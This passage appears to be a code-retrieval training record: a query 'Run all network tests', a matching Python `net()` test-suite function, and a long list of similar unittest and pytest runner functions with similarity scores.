module[1]=='multipleFailedLogins':\n# self.doMultipleFailedLoginsTest( multipleFailedLogins.MultipleFailedLogins(self._target).getPayloads() )\n else:\n self.doTest( module[1], eval( ('%s.%s'+'(self._target,self._cnf).getPayloads()') % (module[1], module[1][:1].upper()+module[1][1:]) ) )\n\n # Done!\n print \"\\n\\n-----------------------\"\n print \"DONE. Check the report.\"\n print \"-----------------------\\n\"", "def main():\n # add all new test suites per test module here\n suite_date = test_date.suite()\n suite_ng = test_ng.suite()\n suite_page = test_page.suite()\n suite_container = test_container.suite()\n\n # add the suite to be tested here\n alltests = unittest.TestSuite((suite_date,\n suite_ng,\n suite_page,\n suite_container))\n\n # run the suite\n runner = unittest.TextTestRunner()\n runner.run(alltests)", "def __main() :\n launchTests()", "def run_tests(tests):\n return [test(t) for t in tests]", "def runAllTests():\n\tttr = unittest.TextTestRunner(verbosity=3).run(suite())\n\tnTests = ttr.testsRun + len(ttr.skipped)\n\tprint(\"Report:\")\n\tprint(\"\\t\" + str(len(ttr.failures)) + \"/\" + str(nTests) + \" failed\")\n\tprint(\"\\t\" + str(len(ttr.errors)) + \"/\" + str(nTests) + \" errors\")\n\tprint(\"\\t\" + str(len(ttr.skipped)) + \"/\" + str(nTests) + \" skipped\")", "def run_tests(self):\n\n self.manifest_path = os.path.join('tests',\n 'l10n',\n 'manifest.ini')\n TestRun.run_tests(self)", "def run_tests(self):\n raise NotImplementedError", "def _run_tests(self):\n for pyunit_testcase in self.cfg.testcases:\n yield self._run_testsuite(pyunit_testcase)", "def test():\n import unittest\n\n tests = unittest.TestLoader().discover(\"tests\")\n unittest.TextTestRunner(verbosity=2).run(tests)", "def collectTests(self, global_ctx):\n pass", "def run_tests():\n test_command = \"pytest -s \" + os.path.join(root_path, \"cases\", \"test_cases.py::TestCases::test_cases\") + \" --html=\" + os.path.join(root_path, \"reports\", \"qa_testing_report.html\")\n\n subprocess.run(test_command, shell=True)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def tests(context):\n black(context)\n isort(context)\n flake8(context)\n pylint(context)\n yamllint(context)\n pydocstyle(context)\n bandit(context)\n pytest(context)\n\n print(\"All tests have passed!\")", "def test_all():\n test_prepare_text()\n test_end_chat()\n test_choose_author()\n test_choose_book()", "def RunAll():\n testfunctions = []\n for name, obj in inspect.getmembers(sys.modules[__name__]):\n if inspect.isfunction(obj) and name != 'RunAll':\n testfunctions.append(obj)\n\n # run all the functions\n for f in testfunctions:\n print('Running %s' % str(f))\n f()", "def runtest(self):", "def run_all(self):\n failures, errors = [], []\n\n # Run each test case registered with us and agglomerate the results.\n for case_ in self.cases:\n case_.run()\n update_results(failures, errors, case_)\n\n # Display our results.\n print_errors(errors)\n print_failures(failures)\n print_overview(errors, failures)\n\n # Exit with 0 if all tests passed, >0 otherwise.\n sys.exit(len(failures) + len(errors))", "def run_all_tests():\n successes = 0\n testsrun = 0\n testsdir = tests_dirpath()\n for test in os.listdir(testsdir):\n path = os.path.join(testsdir, test)\n if os.path.isdir(path):\n testsrun += 1\n if run_test(path):\n successes += 1\n print(\"--- %d/%d TESTS PASSED ---\" % (successes, testsrun))\n return successes == testsrun", "def unittest():\n from a6test import test_all\n test_all()", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def runtests():\r\n\r\n app_abspath = os.path.dirname(os.path.dirname(__file__))\r\n models_abspath = os.path.join(app_abspath, 'models.py')\r\n models_exists = os.path.isfile(models_abspath)\r\n urls_abspath = os.path.join(app_abspath, 'urls.py')\r\n urls_exists = os.path.isfile(urls_abspath)\r\n views_abspath = os.path.join(app_abspath, 'views')\r\n views_exists = os.path.isdir(views_abspath)\r\n tpls_abspath = os.path.join(app_abspath, 'templates')\r\n tpls_exists = os.path.isdir(tpls_abspath)\r\n\r\n for f in [models_abspath, urls_abspath]:\r\n if os.path.isfile(f):\r\n subprocess.call('cp {} {}.orig'.format(f, f), shell=True)\r\n\r\n if views_exists:\r\n subprocess.call('cp -r {} {}.orig'.format(views_abspath, views_abspath), shell=True)\r\n\r\n if tpls_exists:\r\n subprocess.call('cp -r {} {}.orig'.format(tpls_abspath, tpls_abspath), shell=True)\r\n\r\n overwrite_project_language('ja')\r\n subprocess.call('python manage.py generatescaffold test_app I18nModel title:string', shell=True)\r\n time.sleep(1)\r\n overwrite_project_language('en-us')\r\n time.sleep(1)\r\n\r\n subprocess.call('python manage.py generatescaffold test_app GeneratedNoTimestampModel title:string description:text --no-timestamps', shell=True)\r\n time.sleep(2) # Give time for Django's AppCache to clear\r\n\r\n subprocess.call('python manage.py generatescaffold test_app GeneratedModel title:string description:text', shell=True)\r\n\r\n test_status = subprocess.call('python manage.py test --with-selenium --with-selenium-fixtures --with-cherrypyliveserver --noinput', shell=True)\r\n\r\n if models_exists:\r\n subprocess.call('mv {}.orig {}'.format(models_abspath, models_abspath), shell=True)\r\n else:\r\n subprocess.call('rm {}'.format(models_abspath), shell=True)\r\n\r\n if urls_exists:\r\n subprocess.call('mv {}.orig {}'.format(urls_abspath, urls_abspath), shell=True)\r\n else:\r\n subprocess.call('rm {}'.format(urls_abspath), shell=True)\r\n\r\n if views_exists:\r\n subprocess.call('rm -rf {}'.format(views_abspath), shell=True)\r\n subprocess.call('mv {}.orig {}'.format(views_abspath, views_abspath), shell=True)\r\n else:\r\n subprocess.call('rm -rf {}'.format(views_abspath), shell=True)\r\n\r\n if tpls_exists:\r\n subprocess.call('rm -rf {}'.format(tpls_abspath), shell=True)\r\n subprocess.call('mv {}.orig {}'.format(tpls_abspath, tpls_abspath), shell=True)\r\n else:\r\n subprocess.call('rm -rf {}'.format(tpls_abspath), shell=True)\r\n\r\n subprocess.call('rm {}/*.pyc'.format(app_abspath), shell=True)\r\n\r\n sys.exit(test_status)", "def django_run_tests():\r\n \r\n settings_py, manage_py = _CDjangoPluginActivator._instance._FindKeyFiles()\r\n loc = location.CreateFromName(settings_py)\r\n cmd = 'run_test_files(locs=\"%s\")' % settings_py\r\n wingapi.gApplication.ExecuteCommand(cmd)", "def test():\n import unittest\n tests = unittest.TestLoader().discover(tests)\n unittest.TextTestRunner(verbosity=2).run(tests)", "def run_tests():\n argument_parser = ArgumentParser(description=\"Run all tests for {{project name}}\")\n #TODO add some configuration here\n\n settings.configure(**{\n \"DATABASE_ENGINE\" : \"django.db.backends.sqlite3\",\n \"DATABASE_NAME\" : \"sqlite://:memory:\",\n \"ROOT_URLCONF\" : \"tests.urls\",\n \"TEMPLATE_LOADERS\" : (\n \"django.template.loaders.filesystem.load_template_source\",\n \"django.template.loaders.app_directory.load_template_source\",\n ),\n \"TEMPLATE_DIRS\" : (\n path(__file__).dirname() / 'templates',\n ),\n \"INSTALLED_APPS\" : (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n '{{ project_name }},\n ),\n })\n call_command(\"test\")", "def test():\n import unittest\n testmodules = [\n 'bettermathlib_tests',\n 'randomwebapp_tests',\n ]\n suite = unittest.TestSuite()\n for t in testmodules:\n suite.addTest(unittest.defaultTestLoader.loadTestsFromName(t))\n unittest.TextTestRunner(verbosity=2).run(suite)", "def main():\n fix_sys_path()\n result = unittest.TextTestRunner(verbosity=2).run(createTestSuite())\n\n if result.testsRun != EXPECTED_TEST_COUNT:\n raise Exception(\n 'Expected %s tests to be run, not %s.' % (EXPECTED_TEST_COUNT, result.testsRun))\n\n if len(result.errors) != 0 or len(result.failures) != 0:\n raise Exception(\n \"Functional test suite failed: %s errors, %s failures of %s tests run.\" % (\n len(result.errors), len(result.failures), result.testsRun))", "def test():\n\n tests = unittest.TestLoader().discover('api/tests/', pattern='*/test_*.py')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def run_tests(self):\n manifest = manifestparser.TestManifest(\n manifests=[os.path.join(self.repository_path, self.manifest_path)],\n strict=False)\n\n tests = manifest.active_tests(**mozinfo.info)\n self._mozmill.run(tests, self.options.restart)\n\n # Whenever a test fails it has to be marked, so we quit with the correct exit code\n self.last_failed_tests = self.last_failed_tests or self._mozmill.results.fails\n\n self.testrun_index += 1", "def do_test(self):\n\t\tshutit_global.shutit_global_object.yield_to_draw()\n\t\tif not self.build['dotest']:\n\t\t\tself.log('Tests configured off, not running',level=logging.DEBUG)\n\t\t\treturn\n\t\t# Test in reverse order\n\t\tself.log('PHASE: test', level=logging.DEBUG)\n\t\tself.stop_all()\n\t\tself.start_all()\n\t\tfor module_id in self.module_ids(rev=True):\n\t\t\t# Only test if it's installed.\n\t\t\tif self.is_installed(self.shutit_map[module_id]):\n\t\t\t\tself.log('RUNNING TEST ON: ' + module_id, level=logging.DEBUG)\n\t\t\t\tself.login(prompt_prefix=module_id,command=shutit_global.shutit_global_object.bash_startup_command,echo=False)\n\t\t\t\tif not self.shutit_map[module_id].test(self):\n\t\t\t\t\tself.fail(module_id + ' failed on test', shutit_pexpect_child=self.get_shutit_pexpect_session_from_id('target_child').pexpect_child) # pragma: no cover\n\t\t\t\tself.logout(echo=False)", "def run_tests(virtual_env):\n signal.signal(signal.SIGINT, signal.SIG_IGN)\n args = [\n 'python',\n 'setup.py',\n 'nosetests',\n '--with-coverage',\n '--with-xunit',\n ]\n subprocess.call(args, cwd=abspath(join(HOLLAND_ROOT, 'holland-core')), env=virtual_env)\n subprocess.call(['coverage', 'xml'], cwd=abspath(join(HOLLAND_ROOT, 'holland-core')), env=virtual_env)\n for plugin_dir in open(join(HOLLAND_ROOT, 'plugins', 'ACTIVE')):\n plugin_dir = plugin_dir.rstrip()\n plugin_path = join(HOLLAND_ROOT, 'plugins', plugin_dir)\n subprocess.call(args, cwd=plugin_path, env=virtual_env)\n subprocess.call(['coverage', 'xml'], cwd=plugin_path, env=virtual_env)\n for addon_dir in open(join(HOLLAND_ROOT, 'addons', 'ACTIVE')):\n addon_dir = addon_dir.rstrip()\n addon_path = join(HOLLAND_ROOT, 'addons', addon_dir)\n subprocess.call(args, cwd=addon_path, env=virtual_env)\n subprocess.call(['coverage', 'xml'], cwd=plugin_path, env=virtual_env)\n #return subprocess.call(args, env=virtual_env)", "def run_tests(self):\n # Charm does not defer hooks so that test is not included.\n # Trigger a package change which requires a restart\n self.run_package_change_test(\n 'ovn-central',\n 'ovn-central')", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n\n tests = unittest.TestLoader().discover(\"tests\")\n unittest.TextTestRunner(verbosity=2).run(tests)", "def execute(self):\n for test in self.tests:\n test.execute()\n self.logger.dump()\n print(\"Finished!\")", "def test():\r\n import unittest\r\n tests = unittest.TestLoader().discover('tests')\r\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\r\n import unittest\r\n tests = unittest.TestLoader().discover('tests')\r\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\r\n import unittest\r\n tests=unittest.TestLoader().discover('tests')\r\n unittest.TextTestRunner(verbosity=2).run(tests)", "def run_all_unit_tests():\n original = verify.parse_content\n try:\n verify.parse_content = parse_string_in_scope\n\n test_list_of()\n\n test_activity_multiple_choice()\n test_activity_free_text()\n test_activity_multiple_choice_group()\n test_activity_ast()\n\n test_assessment()\n test_assessment_ast()\n\n # test existing verifier using parsing instead of exec/compile\n verify.test_sample_assets()\n finally:\n verify.parse_content = original", "def test():\n loader = unittest.TestLoader()\n suite = loader.discover(os.path.dirname(__file__))\n runner = unittest.TextTestRunner()\n runner.run(suite)", "def test():\n import unittest\n\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def test():\n import unittest\n import tests\n tests = unittest.TestLoader().discover('tests', pattern='*tests.py')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def RunTest(self):\n self.TestLs()\n self.TestTerminate()\n self.TestMultipleProcesses()", "def runTest(self):\n unittest.main()\n ChoreTest.clean_up()", "def run_test_suite(*args):\n test_args = list(args) or []\n execute_from_command_line([\"manage.py\", \"test\"] + test_args)", "def make_all():\n\n if not MASTER.exists():\n os.makedirs(MASTER)\n members = inspect.getmembers(sys.modules[__name__])\n members = [f for f in members if 'test_' in f[0]]\n for member in members:\n print('Running %s...' % member[0], end='')\n member[1](master=True)\n print('done!')", "def make_all():\n\n if not MASTER.exists():\n os.makedirs(MASTER)\n members = inspect.getmembers(sys.modules[__name__])\n members = [f for f in members if 'test_' in f[0]]\n for member in members:\n print('Running %s...' % member[0], end='')\n member[1](master=True)\n print('done!')", "def test():\n import unittest\n tests = unittest \n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def run_main(): # pragma: no cover\n RunTestsCLI.run()", "def test_generate_all_testing(self):\n pass", "def test():\n with lcd(BASEDIR):\n local('virtenv/bin/coverage run runtests.py -v2')\n local('virtenv/bin/coverage report -m')", "def run_tests(self, test_labels):\n import pytest\n\n argv = []\n if self.verbosity == 0:\n argv.append('--quiet')\n if self.verbosity == 2:\n argv.append('--verbose')\n if self.verbosity == 3:\n argv.append('-vv')\n if self.failfast:\n argv.append('--exitfirst')\n if self.keepdb:\n argv.append('--reuse-db')\n\n argv.extend(test_labels)\n return pytest.main(argv)", "def test_all_envs(func):\n register_tests(func, [func.__name__ + '_emulator',\n func.__name__ + '_verilator'])", "def run(self):\n if self.all:\n cmd = self.apply_options(self.test_all_cmd)\n self.call_and_exit(cmd)\n else:\n cmds = (self.apply_options(self.unit_test_cmd, (\"coverage\",)),)\n if self.coverage:\n cmds += (self.apply_options(self.coverage_cmd),)\n self.call_in_sequence(cmds)", "def startTestRun(self):", "def test_lint(self):\n l = self.l\n l.loadTestsFromTestCase\n l.loadTestsFromModule\n l.loadTestsFromName\n l.loadTestsFromNames", "def test_script(self) -> None:\n main()", "def run_tests(session):\n set_environment_variables(PYBAMM_ENV, session=session)\n session.run_always(\"pip\", \"install\", \"-e\", \".[all]\")\n if sys.platform == \"linux\" or sys.platform == \"darwin\":\n session.run_always(\"pip\", \"install\", \"-e\", \".[odes]\")\n session.run_always(\"pip\", \"install\", \"-e\", \".[jax]\")\n session.run(\"python\", \"run-tests.py\", \"--all\")", "def test():\n tests = unittest.TestLoader().discover('project/tests', pattern='test*.py')\n result = unittest.TextTestRunner(verbosity=2).run(tests)\n if result.wasSuccessful():\n return 0\n sys.exit(result)", "def test(test_names):\n import unittest\n if test_names:\n tests = unittest.TestLoader().loadTestsFromNames(test_names)\n else:\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def execute_tests():\n import django\n\n sys.exc_clear()\n\n os.environ[\"DJANGO_SETTINGS_MODULE\"] = \"django.conf.global_settings\"\n from django.conf import global_settings\n\n global_settings.INSTALLED_APPS = ()\n global_settings.MIDDLEWARE_CLASSES = ()\n global_settings.SECRET_KEY = \"not-very-secret\"\n\n global_settings.DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n }\n }\n\n # http://django.readthedocs.org/en/latest/releases/1.7.html#standalone-scripts\n if django.VERSION >= (1,7):\n django.setup()\n\n from django.test.utils import get_runner\n test_runner = get_runner(global_settings)\n\n test_runner = test_runner()\n failures = test_runner.run_tests(['s3cache'])\n sys.exit(failures)", "def runTest(self):\n self.setUp()\n self.test_modul1()" ]
[ "0.8297117", "0.7959936", "0.7950929", "0.7797158", "0.768714", "0.766804", "0.76199144", "0.75607073", "0.7456279", "0.744708", "0.7380929", "0.7380103", "0.72950643", "0.7281221", "0.727362", "0.7181298", "0.71580607", "0.7139827", "0.7125284", "0.70671266", "0.7064775", "0.7064144", "0.7061675", "0.70427084", "0.7038519", "0.70306754", "0.700941", "0.7003991", "0.69682187", "0.6947895", "0.6941255", "0.69383717", "0.69304764", "0.6918372", "0.6917669", "0.6915974", "0.68886817", "0.68886817", "0.68886817", "0.68653417", "0.68638426", "0.6857378", "0.6847217", "0.68454874", "0.6836972", "0.683234", "0.68306434", "0.6830312", "0.68217397", "0.67976826", "0.6779681", "0.6779171", "0.6775913", "0.6768906", "0.6766041", "0.6759414", "0.67546356", "0.6753306", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6749121", "0.6745705", "0.6733487", "0.67334163", "0.67334163", "0.67249024", "0.6722685", "0.67225426", "0.6721593", "0.67075443", "0.67040694", "0.6702716", "0.6687353", "0.6657964", "0.6657964", "0.66578114", "0.6655818", "0.66553026", "0.66426146", "0.6637389", "0.6626522", "0.6612849", "0.6580203", "0.6577367", "0.657586", "0.65680844", "0.655509", "0.65472496", "0.65414315", "0.6520224" ]
0.0
-1
Run all network tests
def net(): suite = ServiceTestSuite() suite.addTest(unittest.makeSuite(Test, 'test_net')) return suite
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_all():\n test_get_to()\n test_error_type()\n test_exchange()\n print(\"All tests passed.\")", "def run_all_tests():\n remove_dbs()\n run_training_tests()\n run_custom_training_tests()\n run_training_save_tests()\n run_validation_tests()\n run_feature_extraction_tests()", "def runTests(self):\n \n pass", "def runAll():\n\n loader = unittest.TestLoader()\n test_dir = pkg_resources.resource_filename('frvcpy.test','.')\n suite = loader.discover(test_dir)\n\n runner = unittest.TextTestRunner(verbosity=2)\n runner.run(suite)", "def main():\n run_test_all()", "def doAllTests(self):\n # Initial offset\n self.getAlertsFile()\n self.offset = self.getOffset(self.config.get('PATHS', 'tempfile'))\n\n # Do all tests\n # As the socket is not persistent, client side attacks have to be done before all tests\n for module in self.modules:\n # Test is performed only if selected in config.cfg\n if self.config.get('TESTS', module[1]) == '1':\n print \"\\n%s\\n------------\" % module[0].upper()\n if module[1]=='clientSideAttacks':\n self.doClientSideAttacksTest( clientSideAttacks.ClientSideAttacks(self._target).getPayloads() )\n# elif module[1]=='multipleFailedLogins':\n# self.doMultipleFailedLoginsTest( multipleFailedLogins.MultipleFailedLogins(self._target).getPayloads() )\n else:\n self.doTest( module[1], eval( ('%s.%s'+'(self._target,self._cnf).getPayloads()') % (module[1], module[1][:1].upper()+module[1][1:]) ) )\n\n # Done!\n print \"\\n\\n-----------------------\"\n print \"DONE. Check the report.\"\n print \"-----------------------\\n\"", "def tests():\n api.local('nosetests')", "def runalltests():\n doctest.testmod()", "def run_tests():\n \n test_constructor_positive()\n test_constructor_negative()\n test_game_move_positive()\n test_game_move_negative()\n test_game_move_edge()\n print(\"Congratulations ! You passed all the game test cases.\")", "def run_custom_training_tests():\n test_custom_training()\n test_custom_distributed_training()\n test_custom_multimodel_training()\n test_custom_distributed_multimodel_training()", "def test_run():\n # Only few steps for test\n timesteps = 128\n\n # Compute all sub testing conf\n envs = ['CartPole-v0']\n ml_platforms = ['torch', 'tf']\n agents = ['dqn', 'a2c']\n\n test_combinations = list(it.product(\n envs,\n ml_platforms,\n agents\n )\n )\n\n # Finally test them all\n for conf in test_combinations:\n env_str, ml_platform_str, agent_str = conf\n run(\n agent_str,\n ml_platform_str,\n env_str,\n 'dense',\n timesteps,\n './target/')", "def run_all_tests(self):\n for index in range(len(self.__test_set_list)):\n self.run_test(index)", "def test_get_networks(self):\n pass", "def test_core(c):\n def test_python(c, filename):\n \"\"\"Run a single python test file in tests/python.\"\"\"\n test_dir = 'tests/python'\n filepath = '{}/{}'.format(test_dir, filename)\n\n print('Restarting network before executing test {}'.format(filepath))\n rm_network(c)\n start_core(c)\n start_horizon(c)\n network(c)\n\n with c.cd(test_dir):\n print('Executing test {}'.format(filepath))\n c.run('pipenv run python {filename} \"{passphrase}\" {whitelist_seed}'.format(\n filename=filename,\n passphrase=PASSPHRASE,\n whitelist_seed=WHITELIST_SEED))\n\n test_python(c, 'test_base_reserve.py')\n test_python(c, 'test_tx_order_by_fee.py')\n test_python(c, 'test_tx_order_by_whitelist.py')\n test_python(c, 'test_tx_priority_for_whitelist_holder.py')\n test_python(c, 'test_whitelist_affected_on_next_ledger.py')\n\n # XXX obsolete\n # see source file for more information\n # test_python(c, 'test_multiple_cores.py')", "def main():\r\n test = TesterNeighbour()\r\n test.setUp()\r\n test.test_result_n()\r\n print(\"result_of_algorithm_test - passed\")", "def run_tests(self):\n raise NotImplementedError", "def tests():", "def main():\n test_network_connection()\n parser()", "def RunTest(self):\n self.TestLs()\n self.TestTerminate()\n self.TestMultipleProcesses()", "def main():\n test_runner = TestRunner(\n FLAGS.workspace, FLAGS.bench_home, imagenet_dir=FLAGS.train_data_dir)\n test_runner.run_tests(FLAGS.test_list.split(','))", "def run_all(self):\n failures, errors = [], []\n\n # Run each test case registered with us and agglomerate the results.\n for case_ in self.cases:\n case_.run()\n update_results(failures, errors, case_)\n\n # Display our results.\n print_errors(errors)\n print_failures(failures)\n print_overview(errors, failures)\n\n # Exit with 0 if all tests passed, >0 otherwise.\n sys.exit(len(failures) + len(errors))", "def run_all_unit_tests(cls):\n suites_list = []\n for test_class in cls.TESTS:\n suite = unittest.TestLoader().loadTestsFromTestCase(test_class)\n suites_list.append(suite)\n result = unittest.TextTestRunner().run(unittest.TestSuite(suites_list))\n if not result.wasSuccessful() or result.errors:\n raise Exception(result)", "def RunTestAll(ss):\n ss.StopNow = False\n ss.TestAll()\n ss.Stopped()", "def run_test_cases(self):\n count = 1\n for test_case in self.test_cases:\n print(\"Running test case #%d\" % count)\n if test_case.name == 'RouteDistance':\n distance = self.get_distance_for_route(test_case.args)\n print('%s distance: %s' % (test_case.args, distance))\n elif test_case.name == 'RouteShortest':\n args = test_case.args.split('|')\n shortest_distance = self.find_shortest_path_between_cities(args[0], args[1])\n print(\"Shortest distance between %s and %s: %d\" % (args[0], args[1], shortest_distance))\n elif test_case.name == 'RouteLessThanHops':\n args = test_case.args.split('|')\n paths = self.trips_hop_constraint_bfs(args[0], args[1], int(args[2]))\n print('Paths between %s and %s with hops less than or equal to %d: %d (%s)' % (\n args[0], args[1], int(args[2]), len(paths), paths\n ))\n elif test_case.name == 'RouteEqualHops':\n args = test_case.args.split('|')\n paths = self.trips_hop_constraint_bfs(args[0], args[1], int(args[2]), equal=True)\n print('Paths between %s and %s with hops equal to %d: %d (%s)' % (\n args[0], args[1], int(args[2]), len(paths), paths\n ))\n elif test_case.name == 'RouteLessThanDistance':\n args = test_case.args.split('|')\n paths = self.trips_distance_constraint_bfs(args[0], args[1], int(args[2]))\n print('Paths between %s and %s with distance less than %d: %d (%s)' % (\n args[0], args[1], int(args[2]), len(paths), paths\n ))\n else:\n raise Exception('Unknown test case: %s' % test_case.name)\n count += 1\n print()", "def run_all_tests(self) -> None:\n self.run_trt_precision_tests()\n logging.info(\"Check analysis result at: %s\", self._output_dir)", "def test_add_network(self):\n pass", "def runtest(self):", "def run(self):\n if self.all:\n cmd = self.apply_options(self.test_all_cmd)\n self.call_and_exit(cmd)\n else:\n cmds = (self.apply_options(self.unit_test_cmd, (\"coverage\",)),)\n if self.coverage:\n cmds += (self.apply_options(self.coverage_cmd),)\n self.call_in_sequence(cmds)", "def main(tests, root_uri, verbose):\n if verbose:\n rv_config.set_verbosity(verbosity=Verbosity.DEBUG)\n\n if len(tests) == 0:\n # no tests specified, so run all\n tests = list(ALL_TESTS.keys())\n else:\n # run all tests that start with the given string e.g \"chip\" will match\n # both \"chip_classification.basic\" and \"chip_classification.nochip\"\n _tests = []\n for t in tests:\n t = t.strip().lower()\n matching_tests = [k for k in ALL_TESTS.keys() if k.startswith(t)]\n _tests.extend(matching_tests)\n if len(matching_tests) == 0:\n console_error(\n f'{t} does not match any valid tests. Valid tests are: ')\n console_error(pformat(list(ALL_TESTS.keys())))\n continue\n tests = _tests\n\n console_info('The following tests will be run:')\n console_info(pformat(tests, compact=False))\n\n with get_tmp_dir() as tmp_dir:\n if root_uri:\n tmp_dir = root_uri\n\n num_failed = 0\n errors = {}\n for test_id in tests:\n test_cfg = ALL_TESTS[test_id]\n errors[test_id] = run_test(test_id, test_cfg, tmp_dir)\n if len(errors[test_id]) > 0:\n num_failed += 1\n\n for error in errors[test_id]:\n console_error(str(error))\n\n for test_id in tests:\n if test_id not in errors:\n continue\n if len(errors[test_id]) == 0:\n console_success(f'{test_id}: test passed!', bold=True)\n else:\n console_error(f'{test_id}: test failed!', bold=True)\n\n if num_failed > 0:\n console_error(\n f'Tests passed: {len(tests) - num_failed} of {len(tests)}')\n console_error('Error counts:')\n console_error(pformat({k: len(es) for k, es in errors.items()}))\n exit(1)", "def run():\n\tsubsuite_list = []\n\tfor _, modname, _ in pkgutil.iter_modules(test.__path__):\n\t\tif modname.startswith(\"test_\"):\n\t\t\tmodule = importlib.import_module('test.' + modname)\n\t\t\tsubsuite = unittest.TestLoader().loadTestsFromModule(module)\n\t\t\tsubsuite_list.append(subsuite)\n\tsuite = unittest.TestSuite(subsuite_list)\n\n\tprint(\"Testing:\\n\")\n\tunittest.TextTestRunner(verbosity=2).run(suite)", "def test_generate_all_testing(self):\n pass", "def train(self, iterations=1):\n for _ in range(iterations):\n self.trainer.train()\n self.test_network()", "def runTest(self):\n self.setUp()\n self.test_NeuroPath1()", "def run_tests(self):\n setup_layers = {}\n layers_to_run = list(self.ordered_layers())\n should_resume = False\n\n while layers_to_run:\n layer_name, layer, tests = layers_to_run[0]\n for feature in self.features:\n feature.layer_setup(layer)\n try:\n self.ran += run_layer(self.options, layer_name, layer, tests,\n setup_layers, self.failures, self.errors,\n self.skipped, self.import_errors)\n except zope.testrunner.interfaces.EndRun:\n self.failed = True\n break\n except CanNotTearDown:\n if not self.options.resume_layer:\n should_resume = True\n break\n\n layers_to_run.pop(0)\n if self.options.processes > 1:\n should_resume = True\n break\n\n if self.options.stop_on_error and (self.failures or self.errors):\n break\n\n if should_resume:\n if layers_to_run:\n self.ran += resume_tests(\n self.script_parts, self.options, self.features,\n layers_to_run, self.failures, self.errors,\n self.skipped, self.cwd)\n\n if setup_layers:\n if self.options.resume_layer is None:\n self.options.output.info(\"Tearing down left over layers:\")\n tear_down_unneeded(\n self.options, (), setup_layers, self.errors, optional=True)\n\n self.failed = bool(self.import_errors or self.failures or self.errors)", "def main():\n run_test_summary1a()\n run_test_summary1c()\n run_test_summary1c()", "def runAllTests():\n\tttr = unittest.TextTestRunner(verbosity=3).run(suite())\n\tnTests = ttr.testsRun + len(ttr.skipped)\n\tprint(\"Report:\")\n\tprint(\"\\t\" + str(len(ttr.failures)) + \"/\" + str(nTests) + \" failed\")\n\tprint(\"\\t\" + str(len(ttr.errors)) + \"/\" + str(nTests) + \" errors\")\n\tprint(\"\\t\" + str(len(ttr.skipped)) + \"/\" + str(nTests) + \" skipped\")", "def __main() :\n launchTests()", "def test_all():\n test_prepare_text()\n test_end_chat()\n test_choose_author()\n test_choose_book()", "def runtests():\n #- Load all TestCase classes from desistar/test/test_*.py\n tests = desistar_test_suite()\n #- Run them\n unittest.TextTestRunner(verbosity=2).run(tests)", "def run_tests():\n good_car = UnreliableCar(\"Good Car\", 100, 90)\n bad_car = UnreliableCar(\"Bad Car\", 100, 10)\n\n for i in range(1, 15):\n print(\"Attempting to drive {}km:\".format(i))\n print(\"{:12} drove {:2}km\".format(good_car.name, good_car.drive(i)))\n print(\"{:12} drove {:2}km\".format(bad_car.name, bad_car.drive(i)))\n\n \"\"\"final states of the cars\"\"\"\n print(good_car)\n print(bad_car)", "def run_tests(self):\n\n self.manifest_path = os.path.join('tests',\n 'remote',\n 'manifest.ini')\n TestRun.run_tests(self)", "def test_routers(self):\n if self.output_file == '':\n self.run_suite()\n else:\n with open(self.output_file, \"w\") as fp:\n self.run_suite(fp)", "def init(self):\n \n self._nc_session = TestBedTests.TBNetconfSession(self.log, self.loop)\n self._nc_proxy = TestBedTests.TBNetconfProxy(self._nc_session, UtCompositeYang, self.log)\n self._netconf_test_objects = []\n self._pbreq_test_objects = []\n\n for cls in NETCONF_TESTS:\n obj = cls(self._dts, self.log, self._nc_proxy, self._loop)\n yield from obj.dts_self_register()\n 